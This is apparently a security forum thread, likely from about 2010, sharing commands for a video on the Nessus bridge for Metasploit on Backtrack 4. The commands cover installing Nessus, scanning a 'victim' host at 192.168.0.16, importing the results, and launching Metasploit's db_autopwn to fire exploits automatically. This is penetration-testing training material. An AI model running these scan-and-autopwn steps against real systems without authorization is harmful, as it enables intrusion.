Nessus bridge for Metasploit

Blip.tv: Sickness - Nessus bridge for Metasploit
Blog post: Nessus bridge for Metasploit. « ihasomgsecurityskills

In this tutorial you will lean how to use the Nessus bridge for Metasploit.
I won't type the commands used in the video because I've typed the commands very slow and you should be able to follow.
Hope you enjoy it and have fun !

Thank You lot for sharing

Thx for the tutorial .. its awesome!

I wrote about how to setup nessus and the commands down that is used in the video.. Here goes:



#Install Nessus on Backtrack4

Code:

---

apt-get update && apt-get upgrade
#Go to Tenable Network Security and download Nessus-4.2.0-ubuntu804_i386.deb to /root
#Open terminal
cd /root
dpkg -i Nessus-4.2.0-ubuntu804_i386.deb

---

#add a nessus-user with the folowing command:

Code:

---

/opt/nessus/sbin/nessus-adduser

---

#make the user admin when asked for it
#register Nessus as a home user for free via this link:
Tenable Network Security
#register Nessus with the key you recieved on the email adress you entered

Code:

---

/opt/nessus/bin/nessus-fetch  --register [your key]

---

#Run nessus via web-interface (optional)

Code:

---

/etc/init.d/nessusd start

---

#Open your browser (i.e Konqueror) and type:
https://127.0.0.1:8834
#Backtrack 4 is using Firefox with the NoScript Addon. It will block per default the running scripts. To see #the login page, you need to disable this feature for the local webserver.

________________________

#update msfconsole for nessus-plugin

Code:

---

msfupdate
svn up

---

#press P for permanently adding the fingerprint

#start nessus

Code:

---

/opt/nessus/sbin/nessusd

---

# new shell

Code:

---

cd /pentest/exploits/framework3/
./msfconsole
load nessus
nessus_help
nessus_connect username:password@127.0.0.1:8834 ok
nessus_server_status
nessus_admin
nessus_plugin_list
nessus_policy_list
nessus_scan_new -1 victim 192.168.0.16
nessus_scan_status
nessus_report_list

---

# Check for ID

Code:

---

nessus_report_hosts <ID>
nessus_report_host_ports 192.168.0.16 <ID>

---

# further inspect ssh on port 22

Code:

---

nessus_report_host_detail 192.168.0.16 22 tcp <ID>

---

#start op autopwn

Code:

---

db_driver sqlite3
db_connect
nessus_report_get <ID>
db_hosts
db_autopwn -t -x -p -e

---

Good work brother excelent video

regards

Glad you guys like it :)
Btw M00kaw thanks for the commands :)

Thanks for the tutorial sickness. Nice...

Thanx for the tutorial, maybe some help to those who are new in using nessus, you have to open 127.0.0.1:8834 and you have to set policies, that this tutorial will work for you.

Thnx, Tr00G33k

i'm in china,i can't wach the video on blip.tv!!!

不过还是感谢作者！！！

Quote:

---

Originally Posted by Chinese

i'm in china,i can't wach the video on blip.tv!!!

不过还是感谢作者！！！

---

Hmmm I will try to upload them somewhere else also, it might take a while :)

Is it the goverment that is blocking it or it is blip.tv?